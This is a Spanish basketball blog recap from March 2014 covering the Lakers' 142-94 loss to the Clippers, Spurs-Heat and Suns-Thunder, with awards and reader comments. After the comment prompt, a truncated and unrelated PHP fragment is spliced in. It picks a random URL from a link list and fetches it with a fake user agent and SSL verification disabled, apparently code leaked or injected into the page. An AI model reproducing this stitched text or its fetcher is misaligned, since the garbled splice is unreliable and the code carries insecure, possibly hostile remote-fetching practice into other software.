La Crónica: Bochorno

07 de March de 2014 por Simon

Eso es lo que fue el partido de ayer entre Lakers y Clippers. A pesar de que los amarillos ya nos tenían acostumbrados este año a algunaque otra  derrota que otra vergonzosa, lo de ayer superó el límite: 142-94. No, no hay ningún error, este fue el marcador del partido. Lakers recibió ayer la peor derrota de su historia y encima lo hicieron como locales y ante el vecino al que otrora humillaban temporada tras temporada. Al término del primer cuarto nadie podía imaginar la tragedia que se avecinaba ya que los Clippers acabaron sólo dos puntos arriba. La tormenta empezaría en el segundo cuarto, en el que los Clippers anotaron 44 puntos y dejaron a los Lakers en sólo 13 ante la mirada de desesperación de Mitch Kupchak. En el siguiente cuarto la ventaja de los vistantes aumentaría en 16 puntos más y en el último cuarto la diferencia superó, por momentos, los 50 puntos.  Este era el tercer partido de la temporada que enfrentaba a Lakers y Clippers. En el partido inaugural de la temporada los Lakers consiguieron sorprender a los Clippers pero en los dos siguientes los de Doc Rivers se han desquitado con un +84 de diferencia.

Ayer además se vivió la reedición de las finales de la NBA. Miami visitaba San Antonio con la intención de seguir recortando distancia a los Indiana Pacers en su pelea por el primer puesto de la conferencia. Los locales se tomaron buena venganza endosando una de las mayores derrotas del curso a los Heat. El primer cuarto ya anunciaba la que se le venía encima a James y compañía con un +15 para los de Popovich.  Tras conseguir recortar algo la distancia durante los dos siguientes cuartos, Miami se quedó en sólo 13 puntos en el último ante una subida de intensidad defensiva de los Spurs y el partido se decantó claramente a favor de los tejanos (87-111). ¿Es Kawhi Leonard el único jugador en la tierra capaz de molestar a Lebron James? Ayer cuando se enfrentaron directamente uno al otro, Leonard superó totalmente a James, sólo le permitió lanzar a canasta 6 veces y le forzó a perder 5 balones y a jugar uno de sus peores partidos de la temporada. A pesar de terminar con 19 puntos necesitó 18 lanzamientos, porcentajes a los que no nos tiene acostumbrados “King” James. 

Los Suns siguen empeñados en llevarnos la contraria a todos los que opinamos que su caída fuera de los Play Offs es inminente. Ayer vencieron al líder de la conferencia, Oklahoma City Thunder, gracias al mejor partido de la carrera de Gerald Green que fue capaz de dar la vuelta a la tortilla cuando peor estaban las cosas para sus Phoenix Suns. Y es que hasta el tercer cuarto la conexión Russell Westbrook-Kevin Durant funcionó a la perfección y los Thunder consiguieron una ventaja cómoda. En ese momento Gerald Green entró en combustión y con 25 puntos en el tercer cuarto lideró la remontada de unos Suns que consiguieron neutralizar una desventaja que había llegado a ser de 16 puntos. En los minutos finales del partido los Suns fueron superiores y se llevaron la victoria en un final apretado (122-128). Con esta victoria los Suns consiguen dejar octavos de nuevo a los Mavs y cogen algo de aire tras tener a los Grizzlies prácticamente igualados. Y la semana que viene vuelve Bledsoe…

PREMIOS

MVP: Ya hemos hablado de él en la crónica. El indiscutible MVP de la noche fue Gerald Green. Career high, remontada y victoria, poco más se puede pedir. No queremos dejar sin mencionar al eterno Tim Duncan (23 puntos y 11 rebotes) y a su compañero Kawhi Leonard que a pesar de no ser determinante en ataque, sí lo fue en defensa.

Rookie: Los jueves no son noches para rookies. Alex Len se quedó en 6 puntos y 3 rebotes.

Sorpresa: El ya premiado Gerald Green encaja a la perfección también aquí. En una jornada tan corta y con sólo tres partidos las probabilidades de actuaciones sorprendentes son escasas.

Decepción: Sin duda la decepción de la noche fueron los Lakers al completo. No esperábamos grandes cosas de ellos pero lo de ayer no tiene ninguna  justificación.

Esfuerzo en vano: A la pareja de Oklahoma sin duda se les debió quedar cara de tontos después de perder el partido a pesar de la gran actuación de ambos. Russell Westbrook firmó 36 puntos, 9 rebotes, 9 asistencias y 4 robos mientras que Kevin Durant se quedó en 34 puntos, 7 rebotes y 5 asistencias.

Comenta

6 comentarios a esta entrada

  1. Esteban dice:
    #1

    Los Lakers, tontamente mantuvieron a Gasol, lo que hace que sus fanáticos no consideren la temporada como perdida y mantienen alguna vaga ilusión de molestar en el clásico con los clippers, cuando eso, este año ya no es posible

    en todo caso, toda la humillacion de este año, sera olvidada cuando puedan elegir a Smart o a Exum y tenga 30 o 40 millones para invertir en agentes libres el proximo año

      Citar

  2. GreenPride dice:
    #2

    Bueno pues ayer noche de palizas y de sorpresa en la mejor liga del mundo.
    En la reedición de las Finales los Spurs dieron buena cuenta de los Heat a base de defensa y aprovechar sus transiciones y su buen juego de pase y continuación. Abrieron renta pronto y luego cuando se vieron apretados subieron su intensidad defensiva comandados por un Kawhi Leonard espectacular en defensa para sacar de rueda a los de Miami. Sin duda los Heat han desaprovechado la oportunidad de coger la delantera a unos Pacers que no están nada finos con sus dos derrotas en Texas ante Rockets y Spurs y deberán seguir apretando si quieren conseguir esa primera plaza de la conferencia de cara a los Playoffs.
    Por su parte los Spurs ven como Parker ya parece en plena forma y con un Duncan sensacional y un cada vez más importante Leonard parecen irse encaminando a un nuevo asalto al título del que tan cerca quedaron el año pasado.
    Del resto bochornoso lo de Lakers e increible el temporadón de los Suns y de Gerald Green en particular que cada mes es más jugador que el anterior y va camino de convertirse en la estrella que un día parecía que podía llegar a ser cuando nadie le esperaba ya.

      Citar

  3. Albertis dice:
    #3

    Pero por favor… pero qué equipito de jugones tienen los Suns, jajaja, últimos del Oeste eran los pronósticos!!
    Con ese jugón en el banquillo llamado Hornacek y al mando del equipo el amigo Dragic!!! Vaya par de gemelos y parecía que Green sólo sabía saltar…
    Me encantan!!!

      Citar

  4. Esteban dice:
    #4

    Lo de gerald green e un caso inceible, q edad tiene? 28 años? Q jugador explota de semejante manera a esa edad?

      Citar

  5. Sancho88 dice:
    #5

    Sí porque el año pasado en tus Pacers no le fue muy bien al colega…

      Citar

  6. Esteban dice:
    #6

    Sancho88:
    Sí porque el año pasado en tus Pacers no le fue muy bien al colega…

    en absoluto, quizá no gozo de oportunidades, y eso que traía credenciales luego de una buena temporada en los Nets, de hecho, su contrato era tan toxico que para empaquetarlo, los pacers tuvieron que entregar a Pumblee y una primera ronda, por suerte llego scola como un aliciente a un trade terrible

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>